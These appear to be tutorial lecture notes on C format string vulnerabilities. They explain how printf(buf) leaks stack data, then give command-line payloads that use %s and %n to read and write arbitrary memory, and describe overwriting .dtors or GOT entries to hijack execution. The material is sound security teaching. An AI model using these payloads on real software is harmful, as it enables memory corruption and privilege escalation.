Format String Exploits




1 - A history lesson


Buffer overflows have been around since the mid-1980s.  THE doc on stack
overflows was published in:


     P H R A C K   4 9

     November 08, 1996

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

by Aleph One


Since the discovery of buffer overflows there have been a few thousand in the
wild.


Format string exploits were made public in June 1999.  Only a few dozen
have been seen.

   Application                Found by            Impact          Years
  -------------------------------------------------------------------------
   wu-ftpd 2.*                security.is         remote root     > 6
   Linux rpc.statd            security.is         remote root     > 4
   IRIX telnetd               LSD                 remote root     > 8
   Qualcomm Popper 2.53       security.is         remote user     > 3
   Apache + PHP3              security.is         remote user     > 2
   NLS / locale               CORE SDI            local root       ?
   screen                     Jouko Pynnonen      local root      > 5
   BSD chpass                 TESO                local root       ?
   OpenBSD fstat              ktwo                local root       ?

(Table taken from: http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html )



2 - What is a format string?
	- Question:  How do you output data in a C program? 

		answer


	- Let's take a look at an example of format strings in action.

		example1
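
		example1 itself is not reproduced in these notes.  As a rough stand-in,
		here is a minimal sketch of a format string at work.  The function name
		format_demo and the output layout are assumptions made for illustration,
		not the code shown in the talk.

```c
#include <stdio.h>

/* Hypothetical stand-in for example1: formats one int three ways
 * into `out` and returns the number of characters produced. */
int format_demo(char *out, size_t len, int value)
{
    /* %d = signed decimal, %x = hex, %08x = hex zero-padded to 8 digits */
    return snprintf(out, len, "dec=%d hex=%x padded=%08x",
                    value, (unsigned)value, (unsigned)value);
}
```

		Calling format_demo(buf, sizeof buf, 255) should leave
		"dec=255 hex=ff padded=000000ff" in buf.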



3 - Malformed Format Strings
	- Recall from example1 the use of the %x conversion specifier.
	  It prints, in hex, the value of the corresponding argument to the
	  printf() call.


	- Question: What happens when the number of conversion specifiers in the
	  format string and the number of arguments are not equal?

		answer

	- What does this really mean?  Well... let's see the code:
		
		example2

	- Where exactly is the data that's being read?  If you've been paying
	  attention to the other talks, you should know this...  But if I have to
	  spell it out for you...


		When printf("%d %08x.%08x.%08x.%08x.%08x.%08x.%08x.", i); is
		called, just like any other function, its arguments are pushed onto the
		stack, followed by the return address, the saved frame pointer, and then
		that function's local variables.

		Below is a (hopefully) familiar diagram of the stack when printf() is 
		called (note that the stack grows down in the figure):


		+---------+
		|   old   |
		+---------+
		|   data  |
		+---------+  <- 'top' of stack before call to printf()
		|    i    |
		+---------+
		| fmt_str |
		+---------+
		|   ret   |
		+---------+
		|   sfp   |
		+---------+  <- 'top' of stack after call to printf()


		The first %d looks at the memory location that the first argument
		*should* be at, in this case 'i' is located there.  The next %08x will
		look at the next memory location on the stack, where it expects to find
		the 2nd argument... instead it finds old data left on the stack from
		before the function call.
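
		Calling the real printf() with too few arguments is undefined behavior,
		so the walk described above is sketched here as a toy model instead.
		The name toy_printf and the `stack` array are assumptions for
		illustration: the array stands in for the words sitting above the
		format string pointer, and each %x takes the next word whether or not
		the caller meant to supply it.

```c
#include <stdio.h>
#include <string.h>

/* Toy model, not real printf(): `stack` stands in for the words sitting
 * above the format-string pointer. Each %x consumes the next word,
 * whether or not the caller actually supplied an argument there. */
int toy_printf(char *out, size_t len, const char *fmt,
               const unsigned *stack, size_t nwords)
{
    size_t used = 0, next = 0;
    for (const char *p = fmt; *p != '\0' && used + 9 < len; p++) {
        if (p[0] == '%' && p[1] == 'x' && next < nwords) {
            used += (size_t)snprintf(out + used, len - used,
                                     "%08x", stack[next++]);
            p++;                       /* skip the 'x' */
        } else {
            out[used++] = *p;          /* ordinary character */
        }
    }
    out[used] = '\0';
    return (int)next;                  /* words consumed from the "stack" */
}
```

		With stack = { 42, 0xdeadbeef, 0xcafebabe } and the format "%x.%x.%x",
		only the first word plays the role of 'i'; the other two play the
		role of the old data that the extra specifiers end up printing.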
		

	- That's great, but who cares?
	
		It is unlikely that a programmer will string together a ton of %x for no
		reason except to let you view the contents of the stack.  But there is
		something a programmer might do...



4 - The vulnerability
	- The right way to print a string:
		printf("%s", buf); 


	- The wrong way to print a string:	
		printf(buf); 


	See: example3
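
	example3 is not reproduced in these notes.  The difference between the
	two calls can be sketched as follows; the function names print_safely and
	print_unsafely are hypothetical, and snprintf() is used in place of
	printf() only so the result can be inspected.

```c
#include <stdio.h>

/* Safe: `input` is passed as data, so any % characters in it are inert. */
int print_safely(char *out, size_t len, const char *input)
{
    return snprintf(out, len, "%s", input);
}

/* Unsafe pattern: `input` IS the format string, so %x, %s and %n inside
 * it are interpreted. Shown for contrast only; never call this with
 * untrusted input. Compilers typically warn about this line. */
int print_unsafely(char *out, size_t len, const char *input)
{
    return snprintf(out, len, input);
}
```

	A harmless way to see the difference is the input "100%%": the safe
	version copies it verbatim, while the unsafe version interprets "%%" and
	produces "100%".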

	-  When a programmer makes the mistake of letting you control the format
	string, all hell breaks loose... 


	We can read from the stack above us as before:

		./a.out `perl -e 'print "%08x."x40;'`

	Notice that the bytes 0x25 0x30 0x38 0x78 0x2e are repeated quite a lot.
	These bytes are the ASCII characters "%08x.".  Since the string passed to
	printf() is stored on the stack before the call is made (in our case in
	the buffer 'text'), eventually we end up reading the memory of the format
	string itself.  This is a *good* thing.


	-  What would happen if instead of using so many %08x we put something
	   useful at the start of our format string? 


		./a.out `perl -e 'print "\x7d\xfb\xff\xbf"'`%08x.%08x.%08x.%s

	
	We can now read from arbitrary memory locations!


	- But wait, there's more... remember our friend %n ?  What we did with %s
	  for reading, we can do with %n for writing.

		If you remember the line:

			** test_num @ 0x080496dc = -72 = 0xffffffb8

		We will now use its address as a location to write to...


		./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%08x.%n


		The %n will write, to whatever address we pass it, the number of bytes
		printed up to that point.  In this case it outputs:

			** test_num @ 0x080496dc = 31 = 0x0000001f

		What is this 31?  The string we passed to printf() starts with
		"\xdc\x96\x04\x08", which is 4 bytes.  Each %08x prints 8 characters,
		so 8 x 3 = 24, plus the 3 `.' characters.  24 + 3 + 4 = 31.

		We can change the field width of %x to any number we want to control
		what gets written by %n.

		./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%080x.%n
			
			** test_num @ 0x080496dc = 103 = 0x00000067
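
		The two counts above (31 and 103) can be reproduced without exploiting
		anything by giving %n a legitimate int pointer.  This is only a sketch:
		the function name count_before_n is made up, "AAAA" stands in for the
		4 address bytes, and the values 1, 2, 3 stand in for whatever happens
		to be on the stack.

```c
#include <stdio.h>

/* Returns the value %n stores after a 4-byte prefix and three hex
 * fields; `last_width` is the field width of the third %x.
 * "AAAA" stands in for the address bytes at the start of the exploit
 * string, and 1, 2, 3 stand in for the words read from the stack. */
int count_before_n(int last_width)
{
    char scratch[256];
    int count = -1;

    /* %0*x takes its field width from the int argument before the value */
    snprintf(scratch, sizeof scratch, "AAAA%08x.%08x.%0*x.%n",
             1u, 2u, last_width, 3u, &count);
    return count;
}
```

		count_before_n(8) gives 4 + 9 + 9 + 9 = 31, and count_before_n(80)
		gives 4 + 9 + 9 + 81 = 103, matching the test_num values above.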


	- What we can do now is write to any arbitrary memory location.  But writing
	the number of characters printed by %08x and the other crap in our format
	string isn't that useful... or is it?

		Suppose we want to write something like 0xDDCCBBAA, which has the form
		of a memory address.  We can use multiple %n directives aimed at 4
		consecutive byte addresses.  That way we overlap small values byte by
		byte, instead of trying to write a gigantic number of bytes to the
		screen or file.

		Conceptually it looks like this:


                AA 00 00 00          |  0x080496dc
                   BB 00 00 00       |  0x080496dd
                      CC 00 00 00    |  0x080496de
                         DD 00 00 00 |  0x080496df
               ----------------------|
                AA BB CC DD          |  Result starting at 0x080496dc

              After re-writing this in the correct byte order: 0xDDCCBBAA
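
	The diagram can be checked with a small simulation.  This is a sketch
	under assumptions: store_le32 and overlapped_write are hypothetical names,
	and the byte array stands in for the memory at 0x080496dc.  Each store
	mimics a 4-byte %n write on little-endian x86.

```c
#include <stdint.h>

/* Mimics what a 4-byte %n store does on little-endian x86:
 * the low byte of `count` lands at mem[0], three more bytes follow. */
static void store_le32(uint8_t *mem, uint32_t count)
{
    for (int i = 0; i < 4; i++)
        mem[i] = (uint8_t)(count >> (8 * i));
}

/* Four overlapping stores, one byte apart, as in the diagram.
 * `mem` needs room for 7 bytes: the last store spills 3 zero bytes
 * past the 4-byte target. Returns the target read back as a
 * little-endian 32-bit value. */
uint32_t overlapped_write(uint8_t mem[7])
{
    const uint32_t counts[4] = { 0xAA, 0xBB, 0xCC, 0xDD };

    for (int i = 0; i < 4; i++)
        store_le32(mem + i, counts[i]);

    return (uint32_t)mem[0] | (uint32_t)mem[1] << 8 |
           (uint32_t)mem[2] << 16 | (uint32_t)mem[3] << 24;
}
```

	Note the side effect the diagram also shows: the three bytes following
	the target are zeroed by the last store.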



	
	In code we need to specify each address we want to write to, and put
	four %n to write data to each location.	

	./a.out `perl -e 'print "\xdc\x96\x04\x08JUNK\xdd\x96\x04\x08"'`%x.%x.%146x.%n%017x%n

	The reason for JUNK is because we need a %x between each pair of %n to
	increment the value that will be written, and that %x consumes one word of
	the string as its argument.  The above example will write 0x0000bbaa to
	test_num.

	I will leave the task of writing all four bytes as an exercise for the
	reader.


	- Now, what if we want to write a more legit looking address: 0x0806abcd
	 

		Well first we need to print 205 bytes (0xcd) total, for the first %n, then
		we need to print a total of 171 bytes (0xab) ... What's wrong with this?  
		It should be obvious...

		answer
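
		The slide's answer is not reproduced in these notes.  One common
		workaround, sketched here as an assumption rather than as the talk's
		own answer, relies on the fact that only the low byte of each count
		survives the overlapping writes, so the running count can wrap past
		256.  The helper name pad_for_byte and the min_pad parameter are
		hypothetical.

```c
#include <stdint.h>

/* Given the number of characters printed so far, return how many more
 * must be printed so that the low byte of the running count equals
 * `target`. `min_pad` is the smallest padding we can reliably emit
 * (8 is a common choice, since %x may print up to 8 hex digits). */
unsigned pad_for_byte(unsigned printed, uint8_t target, unsigned min_pad)
{
    unsigned pad = (target + 256u - (printed % 256u)) % 256u;

    if (pad < min_pad)
        pad += 256u;               /* go around once more */
    return pad;
}
```

		For 0x0806abcd, starting from 16 bytes already printed (an assumed
		figure for four 4-byte addresses), the paddings come out as 189, 222,
		91 and 258, giving running counts of 0xcd, 0x1ab, 0x206 and 0x308.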




5 - A better way

	- Direct Parameter Access allows us to eliminate a lot of the JUNK (pun
	  intended).

		An example of direct parameter access:
	
		printf("Argument 7: %7$d, Argument 2: %2$d \n", 10, 20, 30, 40, 50, 60, 70, 80);

		By using %7$d, we tell this particular format string to access the
		memory for the 7th argument.  We can now re-write our previous example: 
	

		./a.out `perl -e 'print "\xdc\x96\x04\x08\xdd\x96\x04\x08"'`%3\$161x.%4\$n%3\$17x%5\$n
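
		Direct parameter access can also be tried in a harmless setting.  The
		sketch below assumes a libc that supports the POSIX %N$ syntax (it is
		not part of ISO C); swap_demo is a made-up name.

```c
#include <stdio.h>

/* %N$ selects the Nth argument after the format string (a POSIX
 * extension, not ISO C). Here the two arguments are printed in
 * reverse order without reordering the argument list. */
int swap_demo(char *out, size_t len, int first, int second)
{
    return snprintf(out, len, "second=%2$d first=%1$d", first, second);
}
```

		swap_demo(buf, sizeof buf, 10, 20) should leave "second=20 first=10"
		in buf.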



6 - The Exploit
	- So, we can read from and write to any memory address we want.  What and
	  where do we want to write?  Well... if you want, you can overwrite the
	  return address of the stack frame above you, just like a stack overflow.
	  But with format strings we're not limited by the same constraints as
	  an overflow.  We can choose to overwrite sections of memory that are
	  more predictable...


	- Enter .dtors.  GCC-compiled programs contain two special
	  sections called .ctors and .dtors.  These sections are made for
	  constructors and destructors.  But wait, C doesn't have constructors and
	  destructors, you fool...  well, not in the object-oriented sense, no... but
	  GCC does let you write functions that are called just before main starts,
	  and just after it exits.

		See: example4
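
		example4 is not reproduced in these notes.  A minimal sketch of such
		functions, using GCC's constructor and destructor attributes, might
		look like the following.  The names startup and startup_ran are
		assumptions; cleanup matches the symbol in the nm listing.  Newer
		toolchains may record these pointers in .init_array / .fini_array
		rather than .ctors / .dtors.

```c
#include <stdio.h>

int startup_ran = 0;   /* set by the constructor, before main() runs */

/* GCC extension: called before main() starts. */
__attribute__((constructor))
static void startup(void)
{
    startup_ran = 1;
}

/* GCC extension: called after main() returns or exit() is called. */
__attribute__((destructor))
static void cleanup(void)
{
    puts("cleanup() called after main");
}
```

		Any main() linked with this code will find startup_ran already set to
		1, and the cleanup() message appears only after main() has finished.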


		Let's take a look at the symbols...


		$ nm a.out 
		080495f0 A __bss_start
		08048330 t call_gmon_start
		080483e6 t cleanup
		080495f0 b completed.4577
		080494e8 d __CTOR_END__
		080494e4 d __CTOR_LIST__
		080495e4 D __data_start
		080495e4 W data_start
		08048464 t __do_global_ctors_aux
		08048354 t __do_global_dtors_aux
		080495e8 D __dso_handle
		080494f4 d __DTOR_END__
		080494ec d __DTOR_LIST__
		080494fc D _DYNAMIC
		080495f0 A _edata
		080495f4 A _end
		         U exit@@GLIBC_2.0
		0804848c T _fini
		080494e4 A __fini_array_end
		080494e4 A __fini_array_start
		080484a8 R _fp_hw
		08048388 t frame_dummy
		080484e0 r __FRAME_END__
		080495c8 D _GLOBAL_OFFSET_TABLE_
		         w __gmon_start__
		080482a4 T _init
		080494e4 A __init_array_end
		080494e4 A __init_array_start
		080484ac R _IO_stdin_used
		080494f8 d __JCR_END__
		080494f8 d __JCR_LIST__
		         w _Jv_RegisterClasses
		0804845c T __libc_csu_fini
		08048400 T __libc_csu_init
		         U __libc_start_main@@GLIBC_2.0
		080483b0 T main
		080495ec d p.4576
		080494e4 A __preinit_array_end
		080494e4 A __preinit_array_start
		         U puts@@GLIBC_2.0
		0804830c T _start



		$ objdump -s -j .dtors ./a.out

		./a.out:     file format elf32-i386
		
		Contents of section .dtors:
		 80494ec ffffffff e6830408 00000000           ............	

	As you can see, the nm command shows the addresses of the start and end
	of .dtors.  Comparing with the objdump output for the .dtors section, you
	can see that __DTOR_LIST__ is the start of .dtors; this address always
	contains ffffffff.  __DTOR_END__ is the address of the last entry in the
	.dtors section (always 00000000).  In between the two is the address of
	our cleanup function (e6830408 is 0x080483e6 in little-endian byte order).



	$ objdump -h ./a.out 
	
	./a.out:     file format elf32-i386
	
	Sections:
	Idx Name          Size      VMA       LMA       File off  Algn
	  0 .interp       00000013  08048114  08048114  00000114  2**0
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  1 .note.ABI-tag 00000020  08048128  08048128  00000128  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  2 .hash         00000030  08048148  08048148  00000148  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  3 .dynsym       00000070  08048178  08048178  00000178  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  4 .dynstr       00000063  080481e8  080481e8  000001e8  2**0
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  5 .gnu.version  0000000e  0804824c  0804824c  0000024c  2**1
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  6 .gnu.version_r 00000020  0804825c  0804825c  0000025c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  7 .rel.dyn      00000008  0804827c  0804827c  0000027c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  8 .rel.plt      00000020  08048284  08048284  00000284  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  9 .init         00000017  080482a4  080482a4  000002a4  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 10 .plt          00000050  080482bc  080482bc  000002bc  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 11 .text         00000180  0804830c  0804830c  0000030c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 12 .fini         0000001a  0804848c  0804848c  0000048c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 13 .rodata       00000037  080484a8  080484a8  000004a8  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	 14 .eh_frame     00000004  080484e0  080484e0  000004e0  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	 15 .ctors        00000008  080494e4  080494e4  000004e4  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 16 .dtors        0000000c  080494ec  080494ec  000004ec  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 17 .jcr          00000004  080494f8  080494f8  000004f8  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 18 .dynamic      000000c8  080494fc  080494fc  000004fc  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 19 .got          00000004  080495c4  080495c4  000005c4  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 20 .got.plt      0000001c  080495c8  080495c8  000005c8  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 21 .data         0000000c  080495e4  080495e4  000005e4  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 22 .bss          00000004  080495f0  080495f0  000005f0  2**2
	                  ALLOC
	 23 .comment      0000010e  00000000  00000000  000005f0  2**0
	                  CONTENTS, READONLY

	The above objdump shows the section headers; notice that .dtors is not
	READONLY.  So, what we can do is use our format string exploit to overwrite
	an entry in the .dtors section with the address of some shellcode.


	TODO: Working example.



	- The Global Offset Table

		

		$ objdump -d -j .plt c.out
		
		c.out:     file format elf32-i386
		
		Disassembly of section .plt:
		
		08048304 :
		 8048304:       ff 35 e0 96 04 08       pushl  0x80496e0
		 804830a:       ff 25 e4 96 04 08       jmp    *0x80496e4
		 8048310:       00 00                   add    %al,(%eax)
		        ...
		
		08048314 :
		 8048314:       ff 25 e8 96 04 08       jmp    *0x80496e8
		 804831a:       68 00 00 00 00          push   $0x0
		 804831f:       e9 e0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048324 <__libc_start_main@plt>:
		 8048324:       ff 25 ec 96 04 08       jmp    *0x80496ec
		 804832a:       68 08 00 00 00          push   $0x8
		 804832f:       e9 d0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048334 :
		 8048334:       ff 25 f0 96 04 08       jmp    *0x80496f0
		 804833a:       68 10 00 00 00          push   $0x10
		 804833f:       e9 c0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048344 :
		 8048344:       ff 25 f4 96 04 08       jmp    *0x80496f4
		 804834a:       68 18 00 00 00          push   $0x18
		 804834f:       e9 b0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048354 <__gmon_start__@plt>:
		 8048354:       ff 25 f8 96 04 08       jmp    *0x80496f8
		 804835a:       68 20 00 00 00          push   $0x20
		 804835f:       e9 a0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048364 :
		 8048364:       ff 25 fc 96 04 08       jmp    *0x80496fc
		 804836a:       68 28 00 00 00          push   $0x28
		 804836f:       e9 90 ff ff ff          jmp    8048304 <_init+0x18>